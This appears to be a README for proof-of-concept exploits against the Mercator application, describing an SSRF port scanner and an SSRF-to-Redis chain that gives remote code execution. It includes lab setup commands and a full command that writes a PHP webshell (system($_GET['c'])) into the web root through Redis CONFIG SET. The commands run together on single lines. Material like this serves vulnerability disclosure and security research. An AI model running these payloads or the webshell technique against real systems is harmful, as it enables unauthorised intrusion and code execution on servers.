2 PoCs are available.
- ssrf2scan.py : Perform a tcp scan using telnet scheme using gohper scheme
- ssrf2rce.py : Perform RCE via webshell by exploiting a vulnerable redis services inside the same network of Mercator.
- reset-lab.sh : Delete the webshell written by the ssrf2rce.py PoC.
To start a lab, used this commands :
After starting the Mercator Docker container, you need to add a second container for the vulnerable Redis instance :
python3 ssrf2scan.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --target 127.0.0.1 --ports 3306docker run -d --name redis-poc --user 501:501 -p 127.0.0.1:6379:6379 -v /var/www/mercator:/var/www/mercator redis:latest redis-server --protected-mode no --save "" --appendonly no --enable-protected-configs yespython3 ssrf2rce.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --redis 127.0.0.1:6379 --pipeline CONFIG SET dir /var/www/mercator/public ';' CONFIG SET dbfilename poc.php ';' SET poc $'\n\n<?php system($_GET["c"]); ?>\n\n' ';' SAVE